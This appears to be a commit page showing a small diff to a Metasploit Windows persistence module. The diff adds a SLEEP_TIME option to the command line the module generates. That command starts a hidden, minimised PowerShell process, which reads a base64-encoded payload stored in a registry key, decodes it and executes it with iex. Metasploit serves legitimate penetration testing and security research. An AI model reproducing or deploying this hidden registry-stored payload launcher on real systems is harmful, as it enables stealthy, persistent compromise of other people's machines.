Added a SLEEP_TIME option
Added a SLEEP_TIME options which is the number of seconds to sleep prior to executing the initial IEX request. This is useful in cases where a machine would have to establish a VPN connection, initiated by the user, after a reboot. Alternatively, as opposed to a sleep time, it could have a loop that attempts to retry for a certain period of item.bug/bundler_fix
parent
089a006408
commit
1fe8bc9cea
|
@ -53,6 +53,8 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
[false, 'The name to use for the \'Run\' key. (Default: random)' ]),
|
||||
OptBool.new('CREATE_RC',
|
||||
[false, 'Create a resource file for cleanup', true]),
|
||||
OptString.new('SLEEP_TIME',
|
||||
[false, 'Amount of time to sleep (in seconds) before executing payload. (Default: 0)', 0]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -66,7 +68,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def generate_cmd(root_path, blob_key_name, blob_key_reg)
|
||||
cmd = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item '#{root_path}:#{blob_key_name}').GetValue('#{blob_key_reg}'))))\""
|
||||
cmd = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"sleep #{datastore['SLEEP_TIME'].to_i}; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item '#{root_path}:#{blob_key_name}').GetValue('#{blob_key_reg}'))))\""
|
||||
return cmd
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue